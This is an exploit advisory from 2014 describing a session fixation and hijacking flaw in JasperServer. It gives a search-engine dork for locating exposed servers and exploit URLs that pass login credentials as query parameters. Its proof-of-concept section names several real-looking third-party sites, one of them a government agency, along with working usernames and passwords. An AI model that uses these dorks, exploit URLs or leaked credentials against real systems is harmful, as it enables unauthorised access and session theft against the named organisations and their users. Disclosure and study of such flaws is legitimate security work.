[+] Session Fixation / Hijacking on JasperServer [+] Date: 09/05/2014 [+] Risk: High [+] CWE number: CWE-384 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.jaspersoft.com/ [+] Software Download : http://sourceforge.net/projects/jasperserver/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Gnu/Linux [+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;) [+] Exploit : http://host/patch//flow.html?_flowId=searchFlow&j_username=&j_password= or http://host/patch/j_acegi_security_check?j_username=&j_password= As part of the login process, the assigned session ID is revealed in a URL parameter that alows Hijack the session of some user. Example: Vul example: coopnet.leosoft.com.br GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste Host: coopnet.leosoft.com.br User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 With a request like that the session ID of the user will be revealed in a url paramter: "JSESSIONID=4635974EAA38774EF00FB270933D3C7D" The application authenticates users with a direct post to the j_acegi_security_check, which does not invalidate the existing session before processing the login request.
Because Of that is possible authenticate a user, or otherwise establishing a new user session, without invalidating any existing session. [+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc j_username=esloc & j_password=esloc http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9 j_username=ratequote & j_password=rateme9 More About session fixation technique on : http://cwe.mitre.org/data/definitions/384.html